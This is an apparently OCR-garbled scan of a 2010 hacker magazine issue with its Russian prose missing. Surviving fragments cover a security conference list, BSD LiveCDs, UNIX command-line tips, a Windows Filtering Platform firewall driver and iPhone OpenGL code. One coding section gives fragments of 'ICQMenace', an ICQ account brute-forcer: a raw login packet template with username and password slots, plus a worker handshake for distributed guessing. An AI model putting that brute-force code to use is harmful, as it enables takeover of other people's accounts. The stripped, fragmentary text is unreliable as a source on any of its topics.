Hack-Quest
][ (,
,
-) Toxa. ,
,
:).
, (, ?),

088

,
.
,
, , HDD Real-time Photo.


CC, ,
, , , .
CC
(16 ), ,
,
,
,
:).


, , -,

.
Chaos Constructions 2010, ,
, :
SDRF open source
, Open Source Hardware,

.
http://party10.cc.org.
ru/seminar.php,

, -

.
, ,
, !

-, ,
,
CC .
, ,
,
, .
CC , ,

, , ,
.
BBS,
MSX-DOS, MS-DOS MacOS,
Atari
XE Game System Amiga 600?
jukni ( )
, .
, , !
,

,
Chaos Constructions . -, ,
, -
,

.
, , . ,
,
EasyJohn.
http://easyjohn.livejournal.com/164192.html.
, , , ,
, , EasyJohn,

X 10 /141/ 10

ArkanoiD
: http://takedo.spb.ru

:
,


,
. , , ,
.
, (3yM), (random),
(oldayn) ,

! , -
,
CC
,
http://party10.cc.org.ru/online.php.

.

CC 2010


-,
. , ,
,

, .

2006 ,
,
-
. : ,
.
, ,
,
, , , ,
- ....
, Defcon, Blackhat,
, ?
, 2006
.


- .
CMS ,
,
-.
X 10 /141/ 10

,
!
, 2007
HIT
.
( Chaos Constructions
HackAround)
, ,
.

:
, ,

.

. , ,
, ,

.
, 2008
-.

.

, , :).
:

-,

.
,
,
-.


:
! ,

. ,
:
,

. ,

- blackbox-
, , : ,
, ,
,
,
. ,
-
:

.
, 2008 - . :
,
.
,
.
:).
,

(,
, Positive
Technologies,
).

WAF
. 2009 - ,

Chaos Constructions.

-
,

:). ,

2010 ! , ,
,
, , -
. ,
-
, .

,

089



, ,

.
!

(
) Chaos Constructions,
: ,
.
,
, , .
. ,

, .
,
.
, -, ...
,
, .
, , , ,
.
? ,
,
-?
toxa@toxahost.ru, .
,
-,
.

CC

-
ESET - (
),
http://www.esetnod32.ru/.
company/podcast/.



, , . ,
BlackHat, Assebly,
Hackers on Planet Earth, DEFCON .. ,
.
,

- 2010.
IT-
.

Hack In The Box

: 13-14
: -,
: http://www.hackinthebox.org/

090

HITB
][, ,
,
Hack In The Box .
X 10 /141/ 10

,
CC

HITB ,
. 2010 ,
(HITB ).
, , -
.
(Kaspersy Lab), (ISC), (ISC)
IT-.

SecTor

: 26-27
: ,
: http://www.sector.ca

,
, , ,
. 2007
: 10.554 11.060
. ,
,
DreamHack ,
- .

HackFest

: 5-6
: ,
: http://www.hackfest.ca

, IT-,
- . SecTor ,
. ,
( SecTor ),
.
, .
.

SecTor, ,
, , ,
, HackFest .

.
, , ()
. HackFest ,
, , .

DeepSec

Chaos Communication Congress

, , IT-. DeepSec ,
, , .
McAfee, Intel,
.
, (Digital Security)
(TREND MICRO Inc).
, , ,
, ,
SAP.

, ,
1984 . , , - Chaos Computer
Club.
, -
, , ,
. ,
, CCC .

: 23-26
: ,
: https://deepsec.net

DreamHack

: 25-28
: , .
: http://www.dreamhack.se
- ,
. 90-,
, .
,
.
DreamHack, Chaos Conctractions,
X 03 /134/ 10

: 27-30
: ,
: http://www.ccc.de

Lanwar

: 2011
: ,
: http://www.lanwar.com
- ,
10 ( 1998 ).
. , Lanwar , ,
. ? ,

. , ( for fun), , , . ,
Lanwar, . z

091

UNIXOID
zobni n@gmail.com

BSD

LiveCD
BSD-

Linux BSD-
. ,
,
. ,
, BSD
, LiveCD
.
LINUX,
,


,
BSD-
.
- BSD,
. FreeBSD, NetBSD,
OpenBSD , ,
DragonFly BSD.
, .

BSD , , BSD-
,

,
. BSD,
.

092


BSD LiveCD.
BSD-, .
Frenzy,
FreeBSD (, ,
).
Jibbed BSDAnywhere,
NetBSD
OpenBSD. ( )
FreeBSD
PC-BSD DesktopBSD,
,
.

Frenzy
: frenzy.org.ua
(frenzy.bspu.ru)
: 1.3 (26 2010)
: FreeBSD 8.1
, -

,
Frenzy ,
BSD,
( , ][)
LiveCD

. ,
,
FreeBSD. Frenzy ,
, -,
, ,
Firefox, Opera, Chrome, XMMS,
MPlayer, Psi, Sylpheed.
Frenzy
,
5 15 .
FreeBSD,
, ACPI,

.

Frenzy,
,
X 11 /142/ 10

INFO

info

IceWM xfe BSDAnywhere


DesktopBSD:

, (
),
..
, .
startx X-
Fluxbox, Conky
,
idesk
xxkb ( ).
, ,
. -
,
. ,
,
, .
- , FreeBSD
, Frenzy,
.
Fluxbox, ,
. ,
:
: Opera, Firefox, Chrome, Dillo, Elinks,
Lynx.
Sylpheed Mutt.
Leafpad Vim.
Psi, Irssi, CenterIM.

aircrack-ng.
VPN- openvpn, pptp-client vpnc.
trafshow, bmon, darkstat, iftop.
3proxy, stunnel
.
TOR.
telnet,
rdesktop vnc.
nmap.
nessus nikto.
wireshark ettercap.
IDS Snort.
ClamAV
ClamTK.
VirtualBox.
.

/ .
.
,
Frenzy
X 11 /142/ 10

FrenzyConf ( frconf, ),
( ,
..),
(ADSL, LAN, VPN) , .
, Frenzy
USB-Flash.
FreeBSD, ,
.
FreeBSD , Frenzy,
, KDE, , .

BSDAnywhere
: bsdanywhere.org
: 4.6 (5 2009)
: OpenBSD 4.6
BSDAnywhere LiveCD OpenBSD.
<Enter>
. OpenBSD
- , , , ACPI,

(boot -c; disable
acpi; quit). , ,
OpenBSD. :
.
, ,
.
: .

LiveCD, GMT,
. : . DHCP-,
<Enter>, no
.
getty . LiveCD
: live root, . live
X-
IceWM . : xterm,
xfe, xfi,

2006
PC-BSD

iXsystems,



,

.
PBI- PC-BSD


FreeBSD

,



.

1.7
,

DesktopBSD,

.
20
2010


.
2009



Frenzy 1.2Lite.
,


FreeBSD.
1.2 1.3

.

093

UNIXOID

DesktopBSD

Frenzy

xmms, Firefox, Thunderbird Mutt, IRC- irssi,


OpenNX VNC.
, LiveCD OpenBSD, OpenSSH OpenCVS.
LiveCD, ,
OpenBSD ,
.

PC-BSD FreeBSD

Jibbed NetBSD
: www.jibbed.org
: 5.0.1 (27 2009)
: NetBSD 5.0.1
, LiveCD
Jibbed ( ),
,
. VirtualBox
qemu, ,

. , ACPI
. ACPI , .

, ,
DHCP, X.org.
ksh .
.
startx ,
, . (,
<Ctrl+Alt+F2>, <Alt+F2>, Linux
FreeBSD), root /etc/X11/xorg.
conf (, vim ).
,
Xfce.
LiveCD- . , NetBSD,
Xfce ,
AbiWord, bash zsh, emacs,
pdf- epdfview, feh,
Firefox3, IM- pidgin, -
xfmedia, rdesktop, squid, screen, joe, mc, mpg321 wget.
NetBSD , ,

.

094

: www.pcbsd.org
: 8.1 (20 2010)
: FreeBSD 8.1
PC-BSD FreeBSD,
BSD- , .
,
BSD Installer, PBI,
,
.
ISO- 3,5 ,
FreeBSD, KDE4
.
, splash-, X- FluxBox , - BSD Installer.
, PC-BSD
:
( ),
( -
, ), ( ), (PC-BSD
FreeBSD ) (DVD ).
(PC-BSD ,
),
, (
Jail), .
,
KDE4 .
,
, , , ,
(, , DHCP-).
,
, . KDE , PC-BSD ,
( )
.

Software Manager,
.
X 11 /142/ 10

PC-BSD FreeBSD
Xfce Jibbed
Linux
deb- synaptic:
, ,
.

pbi,
.
/usr/local, FreeBSD,
/Programs ( Windows Mac OS X).
PC-BSD, ,
/Programs.
,
, Linux (
,
).
KDE ( )
, PC-BSD. , ,
, IP-
. -, System Manager,
,
FreeBSD. -, Services Manager,
.
FreeBSD,
.

DesktopBSD FreeBSD

: www.desktopbsd.net
: 1.7 (7 2009)
: FreeBSD 7.2
PC-BSD DesktopBSD .
,
, BSD
Installer,
KDE. , DesktopBSD
,

.
DesktopBSD ISO-,
.
FreeBSD,
<Enter>.
, , ,
<Ctrl+Alt+Backspace>
.
(live install), , PC-BSD
.
X 11 /142/ 10

PC-BSD

Install ,
PC-BSD,
. : , , ,
( ), (
), , (
).
, .
DesktopBSD
! ,
.
. , ,
, ,
.
. BSDStats,

. BSDStats ,
BSD-, , ,
.
, . , DesktopBSD
KDE 3.5 ,
( -
).
KDE, , , , ,
.
(),
.

(
).
, ,
OpenOffice 3.1.1, Java SE 6, Amarok,
Firefox Gimp.
GRUB
.

, BSD
,

. LiveCD NetBSD OpenBSD , Frenzy, PC-BSD DesktopBSD ,
BSD ,
, Linux.z

095

UNIXOID
zobni n@gmail.com


UNIX
, ,
.

- .
,
,
.
,
, ,

.

,
.

Google

Google ,
,
,
- . Google
,
-

096


.
?
Youtube ?

.
, ,
,
.

,

, .

Google.
GoogleCL (http://
code.google.com/p/googlecl/), -

Google.
,
google,
,
, , Gmail/Android
( Google), Google
Docs,
Picasa Youtube.

, .

(picasa, blogger, youtube, docs, contacts
calendar), , , .

, ,
X 11 /142/ 10

INFO

info
Dropbox

Google
Chrome,
,

Google
( ,

).

Google Docs gmount


Picasa get, create, list, list-albums, tag, post delete,
Blogger post, tag, list delete. , , --title
Blogger Youtube,
--summary
Picasa . ,
, -
. :

1. Blogger:
$ google blogger post --blog 'Linuxoid' --title
'GoogleCL !' --tags 'linux, cli' '
GoogleCL, bla-bla, bla'

2. :
$ google calendar add ' '

3. :
$ google contacts add ' ,zobnin@gmail.com'

4. Google Docs (
,
EDITOR):

Google, , Youtube.
, Youtube youtube-dl (http://bitbucket.org/rg3/youtube-dl/
wiki/Home).
, . Youtube
metacafe.com, Google Video, Photobucket, Yahoo! video, Dailymotion
.
, ,
UNIX- flv- ?

, , ( -u -p),
(-b -d HD-),
( -c). ,
man-. URL
. , ytsearch:HTC Desire, , HTC Desire.
Google Video Yahoo! video
gvsearch ybsearch.

,
Google Docs . gdocs-mountgtk Ubuntu . , :

$ google docs edit --title " "

5. Picasa ( ):
$ google picasa create --title " " \
~/photos/*.jpg

6. Youtube:
$ google youtube post --category Comedy .avi


Google- ( Gmail) ,
GoogleCL . .
GoogleCL ,
X 11 /142/ 10

$ sudo add-apt-repository ppa:doctormo/ppa


$ sudo apt-get update
$ sudo apt-get install gdocs-mount-gtk

: Google
Docs Connection. ,
Gnome Nautilus,
KDE. ,
, google-docs-fs, :
$ sudo apt-get install google-docs-fs

: gmount gumount,
:

097

UNIXOID

web-
mplayer
- Linux
video for linux (v4l), ,
, mplayer:
mplayer tv://.
.
:
$ mencoder tv:// -nosound -ovc lavc -lavcopts
vcodec=mjpeg -o video.avi
,
:
$ mplayer tv:// -tv device=/dev/video1


Gmote
$
$
$
$


Gmote

mkdir gdocs
mount @gmail.com gdocs
ls gdocs
gumount gdocs

Dropbox

- Dropbox,
. ,
( iOS Android), ,
,
( ,

-). Dropbox ,
. Dropbox ,
-,
. ,
Dropbox
.
1. -.
Linux -
- .
, -
, ,
. Dropbox
,

,
. ~/Dropbox torrents - ,
, .
, ( , ), ,
.
2. .
KeePassX, ,
( , -

098

).
(Windows- KeepPass),
, . ,
~/Dropbox,
.
3. Firefox. ,
Firefox ,
, (
) , ,
, , .
, , ,
, , Dropbox.
~/Dropbox:
$ mkdir ~/Dropbox/fx_profile

( XXX , ):
$ mv ~/.mozilla/firefox/XXX.default/* ~/Dropbox/fx/
profile

, Firefox (XXX
):
$ ln -s ~/Dropbox/fx/profile ~/.mozilla/firefox/XXX.
default

,
, (rm -rf
~/.mozilla/firefox/*.default) ,
.
4. . , ,
, Windows.
portablelinuxapps.org
,
Linux-. Dropbox,
,
.
5. Linux-. wiki.
getdropbox.com , Linux- ,
, Dropbox.
: dl.getdropbox.
com/u/30722/dropbox_server.sh dl.getdropbox.com/u/30722/dropbox_
X 11 /142/ 10

client.sh. ~/Dropbox,
dropbox_server.sh, dropbox_client.sh.
(Enter Command:) ,
, .
, ,
,
, . ,
,
mc :). ,

Dropbox, .
, Dropbox
- , ,
.

X-

,
. X- , C,
,
, - , . X- ,
, ,
- ,
, ,
, X- . -

. ~/.xinitrc.
,
-X- Xnest,
X-.
:
$ sudo apt-get install xnest
$ Xnest :1 -ac

:1 X-, ( : 127.0.0.1:1). X- :0, ,


, .
-ac ,
- ( )
.
X-, Xnest ,
,
. , ,
DISPLAY Xnest (
):
$ DISPLAY=:1

X-. ,
,
. , Xephyr ( xserver-xephyr),
Xnest, :
$ Xephyr :1 -ac
X 11 /142/ 10

awesome KDE

, UNIX ,
,
. D-BUS,
,
EWMH (NetWM), .
D-BUS EWMH,
. D-BUS ,
(
, ][ 09.2010), EWMH .

,

.
EWMH- wmctrl.
,
.
(
) , . ,
,
, . :
1. Firefox
:
$ wmctrl -a Firefox

2. google-chrome
:
$ wmctrl -R google-chrome

3. Firefox:
$ wmctrl -r Firefox -e '0,6,0,1040,708'

4. / Xterm:
$ wmctrl -r 'Xterm' -b toggle,shaded

5. Xterm 2:
$ wmctrl -r 'Xterm' -t 2

Wmctrl ,
( -

099

UNIXOID

DNS- IP-

Dropbox

Wikipedia , DNS-
Wikipedia
www.commandlinefu.com.

:
#!/bin/sh
dig +short txt ${1}.wp.dg.cx

xhotkeys, xbindkeys
keytouch).

,
, ,
,

-, -
. , .
, ,
,
-
.
-.
Wi-Fi,
, ,
, ,
.
Android,
Wi-Fi (
Symbian, Windows Mobile). Remote

100

Control Android Market ,


-, PRemoteDroid, Unified Remote
Windows Gmote (www.gmote.org),
Linux-
. .

. (sites.google.com/site/
marcsto/GmoteServerLinux2.0.0.tar.gz),
Java-. , Java Java,
:
$ sudo apt-get install openjdk-6-jre

./GmoteServer.sh ,
- (, ~/video ~/
music) , .
, , .

play, stop, pause ..
,
vlc (
).
, , ,
.

. . ;
, ,
UNIX.z
X 11 /142/ 10

CODING
r0064 r0064@mail.ru

Windows
Filtering Platform

Windows
Filtering
Platform


Server 2008 Vista WFP,


API .
,
.

. kernel-mode,
user-mode .
fwpkclnt.sys, fwpuclnt.dll ( k
u kernel user ).
WFP
, WFP .

102



, :). ,
.
,
. : ,
callout.
CALLOUTS ,
X 11 /142/ 10

>> coding



. ,
.
:
(FWP_ACTION_PERMIT);
(FWP_ACTION_BLOCK);
;
;
.
(FILTERS) , ,
callout.
callout, callout
. , , ,
NAT-callout.
LAYER , (, MSDN, ).
, Microsoft (
), ,
WDK. ,
- ,
. ,
. WDK (Windows Driver Kit),
VmWare,
WinDbg. WDK,
7600.16385.0 (
, fwpkclnt.lib ntoskrnl.lib)
WFP.
, .

Coding

callout
BlInitialize.
callout
:
1) FWPMENGINEOPEN0 ;
2) FWPMTRANSACTIONBEGIN0 WFP;
3) FWPSCALLOUTREGISTER0 callout;
4) FWPMCALLOUTADD0 callout
;
5) FWPMFILTERADD0 ();
6) FWPMTRANSACTIONCOMMIT0 ( ).
, 0.
Windows 7 ,
, FwpsCalloutRegister1 ( FwpsCalloutRegister0). , ,
X 11 /142/ 10

guidgen.exe Microsoft GUID


, 0-
.
FwpmEngineOpen0 FwpmTransactionBegin0

.
FwpsCalloutRegister0:
FwpsCalloutRegister0
NTSTATUS NTAPI FwpsCalloutRegister0
(
__inout void *deviceObject,
__in const FWPS_CALLOUT0 *callout,
__out_opt UINT32 *calloutId
);

, callout ,
.
FWPS_CALLOUT0
(classifyFn)
( / (notifyFn)
(flowDeleteFn)).
,
, , .
, GUID (calloutKey).

HTTP://WWW
links

http://msdn.
microsoft.com/
en-us/library/
aa366510(VS.85).aspx

Windows Filtering
Platform MS.
www.komodia.com/
index.php?page=wfp.
html

LSP-
,
WFP.

callout
FWPS_CALLOUT sCallout = {0};
sCallout.calloutKey = *calloutKey;
sCallout.classifyFn = BlClassify;
//
sCallout.notifyFn =
(FWPS_CALLOUT_NOTIFY_FN0)BlNotify;
// , /

//
status = FwpsCalloutRegister
(deviceObject, &sCallout, calloutId);

103

CODING

-callout (layer)
FwpmCalloutAdd0:
DWORD WINAPI FwpmCalloutAdd0(
__in
HANDLE engineHandle,
__in
const FWPM_CALLOUT0 *callout,
__in_opt
PSECURITY_DESCRIPTOR sd,
__out_opt UINT32 *id
);
typedef struct FWPM_CALLOUT0_ {
GUID
calloutKey;
FWPM_DISPLAY_DATA0 displayData; // callout
UINT32
flags;
GUID
*providerKey;
FWP_BYTE_BLOB
providerData;
GUID
applicableLayer;
UINT32
calloutId;
} FWPM_CALLOUT0;

FWPM_CALLOUT0 applicableLayer
, callout.
FWPM_LAYER_ALE_AUTH_CONNECT_V4. v4
Ipv4,
FWPM_LAYER_ALE_AUTH_CONNECT_V6 Ipv6.
Ipv6 , Ipv4. CONNECT ,
,
! , ,
fwpmk.h WDK.
-callout
// callout
displayData.name = L"Blocker Callout";
displayData.description = L"Blocker Callout";
mCallout.calloutKey = *calloutKey;
mCallout.displayData = displayData;
// callout
//FWPM_LAYER_ALE_AUTH_CONNECT_V4
mCallout.applicableLayer = *layerKey;
status = FwpmCalloutAdd(
gEngineHandle,
&mCallout,NULL,NULL);

, , callout , , ,
callout, .

104

FwpmFilterAdd0,
FWPM_FILTER0.
FWPM_FILTER0 FWPM_FILTER_
CONDITION0 ( numFilterConditions).
layerKey GUID (layer),
. FWPM_LAYER_
ALE_AUTH_CONNECT_V4.
FWPM_FILTER_
CONDITION0. -, fieldKey ,
, , - .
WPM_CONDITION_IP_REMOTE_ADDRESS
, IP-. fieldKey ,
FWP_CONDITION_VALUE,
FWPM_FILTER_CONDITION0.
ipv4-. . matchType ,
FWP_
CONDITION_VALUE , . :
FWP_MATCH_EQUAL, -


filter.flags = FWPM_FILTER_FLAG_NONE;
filter.layerKey = *layerKey;
filter.displayData.name = L"Blocker Callout";
filter.displayData.description =
L"Blocker Callout";
filter.action.type = FWP_ACTION_CALLOUT_UNKNOWN;
filter.action.calloutKey = *calloutKey;
filter.filterCondition = filterConditions;
//
filter.numFilterConditions = 1;
//filter.subLayerKey = FWPM_SUBLAYER_UNIVERSAL;
filter.weight.type = FWP_EMPTY; // auto-weight.
//
filterConditions[0].fieldKey =
FWPM_CONDITION_IP_REMOTE_ADDRESS;
filterConditions[0].matchType = FWP_MATCH_EQUAL;
filterConditions[0].conditionValue.type =
FWP_UINT32;
filterConditions[0].conditionValue.uint32 =
ntohl(BLOCKED_IP_ADDRESS);
//
status = FwpmFilterAdd(
gEngineHandle,
&filter,
NULL,
NULL);

X 11 /142/ 10

>> coding


run

, FWP_MATCH_NOT_EQUAL, , ,
(, ).
FWP_MATCH_GREATER, FWP_MATCH_LESS (. FWP_
MATCH_TYPE). FWP_MATCH_EQUAL.
IP-. , -
, callout.
, ,
.
, , . ,
(FWPM_CONDITION_IP_REMOTE_PORT
FWPM_CONDITION_IP_LOCAL_PORT ). . ! , ,
. , .
, .
(BLOCKED_
IP_ADDRESS), FWP_ACTION_BLOCK:
classify-
void BlClassify(
const FWPS_INCOMING_VALUES* inFixedValues,
const FWPS_INCOMING_METADATA_VALUES* inMetaValues,
VOID* packet,IN const FWPS_FILTER* filter,
UINT64 flowContext,FWPS_CLASSIFY_OUT* classifyOut)
{
// FWPS_CLASSIFY_OUT0
if(classifyOut){ //
classifyOut->actionType = FWP_ACTION_BLOCK;
// FWPS_
RIGHT_ACTION_WRITE
classifyOut->rights&=~FWPS_RIGHT_ACTION_WRITE;}}

FWP_
ACTION_PERMIT, FWP_ACTION_CONTINUE .
callout (, ,
callout ? , BSOD). FwpsCalloutUnregisterById.
32- callout, FwpsCalloutRegister.
callout
NTSTATUS BlUninitialize(){
NTSTATUS ns;
if(gEngineHandle){
FwpmEngineClose(gEngineHandle);
X 11 /142/ 10


}
if(gBlCalloutIdV4){
ns =FwpsCalloutUnregisterById(gBlCalloutIdV4);
}
return ns;
}

. ,
WFP- ,
MS API. ,
,
! , wdk msnmntr (
MSN Messenger-)
kernel-mode .

GUID

callout .
, GUID (Globally Unique Identifier), guidgen.exe, Visual Studio. (VS_Path)\
Common7\Tools. ,
GUID 128 , 2^128 .

Windbg+VmWare.
(
Vista), WinDbg. WinXP
boot.ini, Vista+ bcdedit. , :
BCDedit /dbgsettings SERIAL DEBUGPORT:1
BAUDRATE:115200
BCDedit /debug ON ( BCDedit /set debug ON)


(. ).
! :
start windbg -b -k com:pipe,port=\\.\pipe\
com_1,resets=0

windbg (. ).

, WFP . ,
:).z

105

CODING
RankoR ax-soft.ru

DVD

, ,
-,
, -,
:)

, ?



2008 ,
OstWay, SRQ Brute ICQ
( ICQ) .
ICQ. , ,
.

, ,
? , .
, SOCKS-,
. :
1. , - IP IPv4 , NAT,
, , . ;
2. 99% ,
, .
, ?, . ,
.
? (SOCKS4/5 HTTP(s)), , .
- ,
uin;password,

, , , .
, . .

106

C++ WinSock ( MS Visual


C++ 2008 Express; , ),
C++ Qt,
, + ,

?

ICQ

ICQ?
( ,
, ), :
( : , )
1. ICQ;
2. Hello-. 0x2a (
ICQ);
3. ( UIN,
, , ..);
4.
.
, .
0x2a, ,
X 11 /142/ 10

>> coding

. , , SRV_COOKIE,
BOS-, , ,
.
. ,
( 0x04,
CLOSE_CONNECTION).
OSCAR
, , :
TLV Type, Length, Value
. 0x02 + 0x02 + BLOB .
,
(uint16), .
SNAC Simple Network Atomic Communication, family , type
, , requestId (
, 0x00) ,
, .
FLAP ,
. FLAP
, 0x2a, (0x01
, 0x02 , 0x03 ( ), 0x04
, 0x05 (KeepAlive)).
sequence
, .
, ,
, .
, CLI_
IDENT:
TLV 0x0001 UIN
TLV 0x0002
XOR
"\xf3\x26\x81\xc4\x39\x86\
xdb\x92\x71\xa3\xb9\xe6\x53\x7a\x95\x7c"
TLV 0x0003 ClientID , . ICQ Client AIM
TLV 0x0016 ,
TLV 0x0017, 0x0018, 0x0019, 0x001A, 0x0014
,
TLV 0x000E, 0x000F . (us, en
ru, ru, )

(
),
, , ,
!
TCP
( , ICQ).
, ,
:
class Socket {
public:
bool connectToHost(
const char *hostName,
int port);
X 11 /142/ 10

bool sendData(
const char *buff,
int length);
bool receiveData(
char *buff,
int length);
int bytesAvailable();
void disconnectFromHost()
{
closesocket(sock);
}
private:
SOCKET sock;
};


-.
ICQ- ,
ICQ-:
if(!sock.connectToHost("login.icq.com",
5190))
return false;

HTTP://WWW
links
oscar.asechka.ru
OSCAR
.

WARNING
warning
.

char buff[16];
memset(buff, 0, 16);
sock.receiveData(buff, 10);
if ( buff[0] != 0x2A )
{
sock.disconnectFromHost();
return false;
}
return true;

, ,
, ?
if ( ! sock.connectToHost("login.icq.com",
5190))
return false;
if ( ! bruteSock.sendData(
"\xD\xE\xA\xD\xB\xE\xE\xF", 8) )
{
bruteSock.disconnectFromHost();
return false;
}
char data[8];
if ( ! bruteSock.receiveData(data, 8) ||
memcmp(data, "\xF\xE\xE\xB\xD\xA\xE\xD", 8))
{
bruteSock.disconnectFromHost();
return false;
}
return true;

UIN
.
memset(uin, 0x00, UIN_LENGTH);
memset(pass, 0x00, PASS_LENGTH);
/* Receive uin & pass */
bruteSock.receiveData(uin, 9);
bruteSock.receiveData(pass, 8);
.............

107

CODING

CLI_IDENT ,
, ICQMenace ,
UIN Password, .
, C-style
:).
, , :

ICQMenace v0.9
const char loginData[] = "\x00\x1c\xf0\x21\xcf
\x4a\x00\x1f\xc6\xbd\x83\xdc\x08\x00\x45\x00"
"\x00\x87\x3a\xd4\x40\x00\x80\x06\xec\x16\x0a
\x96\x00\x08\xcd\xbc"
"\xfb\x2b\x07\x48\x14\x46\xa6\xdd\x20\x4c\xa5
\x9e\x57\xa1\x50\x18"
"\xff\xf5\x64\xd3\x00\x00\x2a\x01\x50\x31\x00
\x59\x00\x00\x00\x01"
"\x00\x01\x00%d%sx00\x02\x00%d"
"%s\x00\x03\x00\x0a\x49\x43\x51\x20\x43\x6c
\x69"
"\x65\x6e\x74\x00\x16\x00\x02\x01\x0a\x00\x17
\x00\x02\x00\x06\x00"
"\x18\x00\x02\x00\x05\x00\x19\x00\x02\x00\x00
\x00\x1a\x00\x02\x00"
"\x68\x00\x14\x00\x04\x00\x00\x75\x37\x00\x0f
\x00\x02\x65\x6e\x00"
"\x0e\x00\x02\x75\x73";

ICQ-, ,
, , , 0 , 1 , 2 .

Qt. Qt
TCP- QTcpServer. ,
:
bool listen (
const QHostAddress & address = QHostAddress::Any,
quint16port = 0)

.
(QHostAddress::Any) .
, :
void QTcpServer::newConnection () [signal]

,

QTcpSocket * QTcpServer::nextPendingConnection ()

,
.
(), , :
QtcpSocket *socket = server->
nextPendingConnection();

108

if ( socket == NULL ) {
// Shaitan!!!111
return;
}
socket->write(QByteArray::fromHex(DEADBEEF);
socket->waitForReadyRead();
if ( socket->readAll() != QByteArray::fromHex(
"FEEBDAED") )
// Error
else
// success
socket->disconnectFromHost();
socket->waitForDisconnected();
delete socket;

. :
bool QAbstractSocket::waitForReadyRead (
int msecs = 30000 )


, ,
, msecs ( ). ,
, ,
waitForDisconnected(),
.
QtNetwork .pro.
:
QT += network

, , !
?
1. CLI_IDENT;
2. ;
3. - ,
, .
, ICQ- (CONNECTION_CLOSE). ,
UDP- -
-
( ,
:)).
QUdpSocket. ,
ICQ-;
. z
X 11 /142/ 10

CODING
Fagot salieff@mail.ru

DVD

OpenGL
iPhone

3D-
iPhone SDK

iPhone,
UIKit, Core Graphics Cocoa
Touch, Objective-C .
, Mac OS X,
. - OpenGL ES,
OpenGL
.

, Apple
, iPhone SDK
Mac OS X. , GCC ARM v6 LLVM, .
, , , Mac OS X.
, .
, OSX86,
Mac OS X PC
( )
hackintosh. , , ,
,
SSE3, XNU/Voodoo
.
, , xCode , IDE
GCC. iPhone SDK, Apple
( ,
, ).
- , ,
.

110


GLES-

, , xCode , , , . ,
IDE , GLES,
. Project New Project iPhone OS Application
OpenGL ES Application Choose ,
.
. , render
ESRenderer, ,

.
AppDelegate, /
/ .
GLES EAGLView,
OpenGL-, , .

ESRenderer, . , , .
X 11 /142/ 10

>> coding

xCode IDE
glMatrixMode(GL_PROJECTION);
glEnable(GL_DEPTH_TEST);
glEnable(GL_CULL_FACE);
glFrustumf(...);
glViewport(0, 0, backingWidth,
backingHeight);


.
ESRenderer.h, ES2Renderer.m/h
Shaders,
. ES1Renderer
NSObject, ESRenderer
. EAGLView::initWithCoder
: renderer
= [[ES1Renderer alloc] init].
, . , ,
Objective-C - C++. , .
.m
.mm Objective-C
C++ ,
Cube.mm Cube.h
:
class GLCube {
public :
static GLCube * getInstance();
static void destroyInstance();
void render();
private :
GLCube();
~GLCube();
static GLCube *_internal_instance;
};

ES1Renderer::render.
,
. OpenGL, , , 3D, Z- . 60-
glFrustumf :
X 11 /142/ 10

C++ :
GLCube::getInstance()->render();

, , .


. , ES
glBegin/glEnd,
; ,
, .
ES
.
, GLCube::render 72
12 (3 4
):
static const GLfloat verts[] = {...};
glClear(
GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT);
glLoadIdentity();
glTranslatef(0.0f,0.0f,-4.0f);
glEnableClientState(GL_VERTEX_ARRAY);

HTTP://WWW
links

www.insanelymac.
com, www.applelife.
ru, www.projectosx.
com

.
developer.apple.com/
iphone
.

WARNING
warning



AppStore-,

.

for (size_t i=0; i<6; ++i)


{
glVertexPointer(3, GL_FLOAT, 0, verts+i*12);
glDrawArrays(GL_TRIANGLE_FAN, 0, 4);
}

,
.
, . ,

111

CODING


OpenGL. ES1Renderer::render
, OpenGL-, .
:
glEnable(GL_LIGHTING);
glEnable(GL_LIGHT0);

(
):
glMaterialfv(GL_FRONT_AND_BACK,
GL_AMBIENT, matAmbient);
glMaterialfv(GL_FRONT_AND_BACK,
GL_DIFFUSE, matDiffuse);
glMaterialfv(GL_FRONT_AND_BACK,
GL_SPECULAR, matSpecular);
glMaterialf(GL_FRONT_AND_BACK,
GL_SHININESS, lightShininess);


nsTexName];
CGImageRef spriteImage = uiImage.CGImage;

CG*
CoreGraphics. CoreGraphics Framework
,
, .
iPhone SDK,
Frameworks .
,
. RGBA, ,
4:

:
glLightfv(GL_LIGHT0, GL_AMBIENT, lightAmbient);
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightDiffuse);
glLightfv(GL_LIGHT0, GL_POSITION, lightPosition);

, ,
:
glShadeModel(GL_FLAT);

,
.

,
. . OpenGL
.
. , UIImage iPhone SDK.
,
256x256 (
OpenGL-) . GLCube GLCube::loadTexture(const char *tex_name),
.

UIImage, :
NSString* nsTexName = [[NSBundle mainBundle]
pathForResource: [NSString stringWithUTF8String:
tex_name] ofType:nil];
UIImage* uiImage = [UIImage imageWithContentsOfFile:

112

int tex_width = CGImageGetWidth(spriteImage);


int tex_height = CGImageGetHeight(spriteImage);
GLubyte *spriteData = (GLubyte *) malloc(tex_width *
tex_height * 4);

.
,
,
UIImage . , :
CGContextRef spriteContext = CGBitmapContextCreate(s
priteData, tex_width, tex_height, 8, tex_width * 4,
CGImageGetColorSpace(spriteImage), kCGImageAlphaPrem
ultipliedLast);
UIGraphicsPushContext(spriteContext);
[uiImage drawInRect:CGRectMake(0, 0, tex_width,
tex_height)];
UIGraphicsPopContext();
CGContextRelease(spriteContext);

spriteData OpenGL-

GLCube::tex_id .
.
ES1Renderer::render OpenGL-:
glEnable(GL_TEXTURE_2D);


X 11 /142/ 10

>> coding

, (
). GLCube::render:
static const GLfloat texCoords[] = {...};
...
glBindTexture(GL_TEXTURE_2D, tex_id);
glEnableClientState(GL_TEXTURE_COORD_ARRAY);
...
glTexCoordPointer(2, GL_FLOAT, 0, texCoords + i*8);

,
, id tech 4.
, , ,
. GLCube
ang_x ang_y, incrementAngles.
, render, :
glRotatef(ang_x, 0.0f, 1.0f, 0.0f);
glRotatef(ang_y, 1.0f, 0.0f, 0.0f);

.
UIView,
EAGLView, EAGLView.mm .
:
- (void)touchesBegan:(NSSet*)touches
withEvent:(UIEvent*)event {
for (UITouch *touch in touches) {
last_touch_x = [touch locationInView:self].x;
last_touch_y = [touch locationInView:self].y;
}
}


,
:
X 11 /142/ 10

- (void)touchesMoved:(NSSet*)touches
withEvent:(UIEvent*)event {
for (UITouch *touch in touches) {
int delta_x =
[touch locationInView:self].x - last_touch_x;
int delta_y =
[touch locationInView:self].y - last_touch_y;
GLCube::getInstance()->incrementAngles(
180.0f*delta_x/320.0f, 180.0f*delta_y/480.0f);
last_touch_x = [touch locationInView:self].x;
last_touch_y = [touch locationInView:self].y;
}
}

:
